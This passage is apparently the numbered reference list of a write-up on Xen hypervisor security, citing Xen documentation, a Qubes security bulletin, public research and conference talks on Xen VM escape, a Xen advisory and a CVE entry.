| [3] | http://wiki.xen.org/wiki/X86_Paravirtualised_Memory_Management |
| [4] | https://github.com/QubesOS/qubes-secpack/blob/master/QSBs/qsb-022-2015.txt |
| [5] | https://scumjr.github.io/2016/01/10/from-smm-to-userland-in-a-few-bytes/ |
| [6] | https://conference.hitb.org/hitbsecconf2016ams/sessions/advanced-exploitation-xen-hypervisor-vm-escape/ |
| [7] | https://www.blackhat.com/us-16/briefings.html#ouroboros-tearing-xen-hypervisor-with-the-snake |
| [8] | http://blog.quarkslab.com/xen-exploitation-part-1-xsa-105-from-nobody-to-root.html |
| [9] | http://xenbits.xen.org/xsa/advisory-182.html |
| [10] | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6258 |